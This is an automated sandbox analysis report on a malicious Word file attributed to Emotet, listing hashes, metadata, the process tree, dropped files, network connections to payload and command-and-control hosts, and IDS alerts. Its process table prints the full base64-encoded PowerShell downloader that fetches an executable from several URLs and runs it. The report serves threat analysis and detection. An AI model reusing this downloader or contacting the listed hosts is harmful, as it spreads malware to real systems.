File name: | FILES4947.doc |
Full analysis: | https://app.any.run/tasks/5b0ecc88-d4af-4fbb-add3-50bec70653e4 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | March 21, 2019, 14:30:44 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Mar 20 14:48:00 2019, Last Saved Time/Date: Wed Mar 20 14:48:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 5, Security: 0 |
MD5: | 0AB6B555F1D3AB9E25F40940A0C02467 |
SHA1: | 567C28C0F5AF6FB98C1562EBBB29C11F07D340A9 |
SHA256: | 89375294F0339B33731DEBFF0BAF4953FB097B56929BAFA7A839F594108F4E11 |
SSDEEP: | 3072:a77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qhl5Kd3NHvzkccoj:a77HUUUUUUUUUUUUUUUUUUUT52VGl5K3 |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | - |
---|---|
Subject: | - |
Author: | - |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2019:03:20 14:48:00 |
ModifyDate: | 2019:03:20 14:48:00 |
Pages: | 1 |
Words: | - |
Characters: | 5 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 5 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2712 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\FILES4947.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3708 | powershell -e JABSAEIAWABVAEEANAA9ACgAJwBQAFEAQgBBAEEAJwArACcARAAnACkAOwAkAHAAWgBEAEEAVQBrAHcAQQA9ACYAKAAnAG4AZQAnACsAJwB3ACcAKwAnAC0AbwBiAGoAZQBjAHQAJwApACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAcgBjAEEAQQBBAHgAYwA9ACgAJwBoAHQAdABwADoAJwArACcALwAvAG4AbwByAHQAaAAnACsAJwBwAG8AJwArACcAbABsAHMALgBjAG8AbQAvAHcAbwByAGQAcAByAGUAcwBzACcAKwAnAF8AZQAnACsAJwAvAHgAaAAvAEAAaAB0ACcAKwAnAHQAcAA6AC8ALwBwAGUAYQByAGwAeQB3ACcAKwAnAGgAaQB0AGUAcwAuAGMAbwAuAGkAbgAnACsAJwAvAGMAZwBpAC0AYgBpAG4ALwBUACcAKwAnAHcAUQAvAEAAaAB0ACcAKwAnAHQAcAAnACsAJwA6AC8ALwAnACsAJwBuAG8AJwArACcAdwBuACcAKwAnAG8AdwBzAGEAbABlAHMALgAnACsAJwBjAG8AbQAnACsAJwAvADUANgBtAHQAJwArACcANgBzADgAJwArACcALwBTAGkAUAAvAEAAaAB0AHQAcAA6AC8ALwBvACcAKwAnAHUAJwArACcAawBhAGkAbQBlAGQAZQBuAC4AbwByAGcALwBvAHQAdQBsADYAcABnAC8AZQAnACsAJwB5AGgAJwArACcARwAvACcAKwAnAEAAaAAnACsAJwB0AHQAJwArACcAcAA6ACcAKwAnAC8ALwA4ADUAMAAxAHMAYQBuAGwALgBjAG8AbQAvAHcAcAAtAGMAbwAnACsAJwBuAHQAZQBuAHQALwBBAEsAZwBEACcAKwAnAC8AJwApAC4AKAAnAFMAJwArACcAcABsAGkAdAAnACkALgBJAG4AdgBvAGsAZQAoACcAQAAnACkAOwAkAHQARAAxAEEAbwBRAFoAQQA9ACgAJwBxAF8AJwArACcAYwBEAHcAJwArACcANAAnACkAOwAkAEcAQQBEAEIANABBAFEAbwAgAD0AIAAoACcAMgAnACsAJwA5ADgAJwApADsAJAB3AHcAYwB3AEMAdwBVAD0AKAAnAFUAJwArACcARwBBAGMAQgBVACcAKQA7ACQAYgBBAFUAXwBRAEEAQQBVAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABHAEEARABCADQAQQBRAG8AKwAoACcALgBlAHgAJwArACcAZQAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABBADQAWgBjAFoAVQAgAGkAbgAgACQAcgBjAEEAQQBBAHgAYwApAHsAdAByAHkAewAkAHAAWgBEAEEAVQBrAHcAQQAuACgAJwBEAG8AJwArACcAdwAnACsAJwBuAGwAbwAnACsAJwBhAGQARgBpAGwAZQAnACkALgBJAG4AdgBvAGsAZQAoACQAQQA0AFoAYwBaAFUALAAgACQAYgBBAFUAXwBRAEEAQQBVACkAOwAkAGQANABBAEEARABBAEIAeAA9ACgAJwBMAHcAQQBDAEEAXwAnACsAJwBjACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAJwArACcAdABlAG0AJwApACAAJABiAEEAVQBfAFEAQQBBAFUAKQAuACIATABFAG4AYABnAHQASAAiACAALQBnAGUAIAA0ADAAMAAwADAAKQAgAHsAJgAoACcASQAnACsAJwBuACcAKwAnAHYAbwBrAGUALQBJAHQAZQBtACcAKQAgACQAYgBBAFUAXwBRAEEAQQBVADsAJAB1AG8ARABCAEEAQQBBAD0AKAAnAHcAQgA0ACcAKwAnADEAUQAnACsAJwBRACcAKQA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAewB9AH0AJABPADQAQgBEAEEAWABBAFEAPQAoACcAdgAnACsAJwBBAFEAQQB4ACcAKwAnAEQAQQBHACcAKQA7AA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2132 | "C:\Users\admin\298.exe" | C:\Users\admin\298.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Dism Image Servicing Utility Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3516 | --3cb22fef | C:\Users\admin\298.exe | 298.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Dism Image Servicing Utility Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2972 | "C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe" | C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe | 298.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Dism Image Servicing Utility Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3672 | --9bc43e78 | C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe | wabmetagen.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Dism Image Servicing Utility Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2712 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRFB5E.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3708 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KC7PY6Y11QXJ3ZD3AXK3.temp | — | |
MD5:— | SHA256:— | |||
2712 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:857BD0482B2377909982EC31628FED46 | SHA256:30D7FFD66D416E1CEDD3B1FFFA40EA8BE4AD86D006A9DAE23B5EC164B30B0C0B | |||
3516 | 298.exe | C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe | executable | |
MD5:E45CC6EBA0BBB2AA4FA73AC833532AE4 | SHA256:B1B1A64A240263479216A623C8E0F60E545F30D4BEF0056F3C4CC7C8E42F4DED | |||
3708 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:16D0FD6E07266B2C15A9D7BC6623F506 | SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B | |||
2712 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:FE0B75C34D980AE8FCEB0BEBBCE0C06E | SHA256:F1BF73443DB9D155CFA5BC9A52DF595B7A0C26386DB897CCEE7EC1845186E8DF | |||
3708 | powershell.exe | C:\Users\admin\298.exe | executable | |
MD5:E45CC6EBA0BBB2AA4FA73AC833532AE4 | SHA256:B1B1A64A240263479216A623C8E0F60E545F30D4BEF0056F3C4CC7C8E42F4DED | |||
2712 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$LES4947.doc | pgc | |
MD5:B10310C5EAD8DBFBAAD8DDD573F4DFE2 | SHA256:ED7430C5BE038A4D52D8F7C9465DB457E5693A65FDF97499D3185D1146F32324 | |||
3708 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF100580.TMP | binary | |
MD5:16D0FD6E07266B2C15A9D7BC6623F506 | SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3708 | powershell.exe | GET | — | 195.8.208.243:80 | http://northpolls.com/wordpress_e/xh/ | NL | — | — | suspicious |
3708 | powershell.exe | GET | 200 | 167.99.57.70:80 | http://pearlywhites.co.in/cgi-bin/TwQ/ | US | executable | 184 Kb | suspicious |
3672 | wabmetagen.exe | POST | — | 5.230.147.179:8080 | http://5.230.147.179:8080/vermont/nsip/ | DE | — | — | malicious |
3672 | wabmetagen.exe | POST | — | 203.143.86.111:8080 | http://203.143.86.111:8080/pnp/ | AU | — | — | malicious |
3672 | wabmetagen.exe | POST | — | 185.94.252.3:443 | http://185.94.252.3:443/jit/taskbar/ | DE | — | — | malicious |
3672 | wabmetagen.exe | POST | — | 64.13.225.150:8080 | http://64.13.225.150:8080/forced/cookies/ | US | — | — | malicious |
3672 | wabmetagen.exe | POST | — | 133.242.156.30:7080 | http://133.242.156.30:7080/tlb/taskbar/ringin/merge/ | JP | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3672 | wabmetagen.exe | 185.94.252.3:443 | — | Andreas Fahl trading as Megaservers.de | DE | malicious |
3708 | powershell.exe | 195.8.208.243:80 | northpolls.com | Duocast B.V. | NL | suspicious |
3708 | powershell.exe | 167.99.57.70:80 | pearlywhites.co.in | — | US | suspicious |
3672 | wabmetagen.exe | 133.242.156.30:7080 | — | SAKURA Internet Inc. | JP | malicious |
3672 | wabmetagen.exe | 64.13.225.150:8080 | — | Media Temple, Inc. | US | malicious |
3672 | wabmetagen.exe | 5.230.147.179:8080 | — | GHOSTnet GmbH | DE | malicious |
3672 | wabmetagen.exe | 203.143.86.111:8080 | — | OMNIconnect Pty Ltd | AU | malicious |
Domain | IP | Reputation |
---|---|---|
northpolls.com |
| suspicious |
pearlywhites.co.in |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
3708 | powershell.exe | A Network Trojan was detected | ET POLICY Terse Named Filename EXE Download - Possibly Hostile |
3708 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3708 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3708 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
3672 | wabmetagen.exe | A Network Trojan was detected | ET CNC Feodo Tracker Reported CnC Server group 6 |
3672 | wabmetagen.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST) |
3708 | powershell.exe | A Network Trojan was detected | ET POLICY Terse Named Filename EXE Download - Possibly Hostile |
3672 | wabmetagen.exe | A Network Trojan was detected | ET CNC Feodo Tracker Reported CnC Server group 18 |
3708 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3708 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |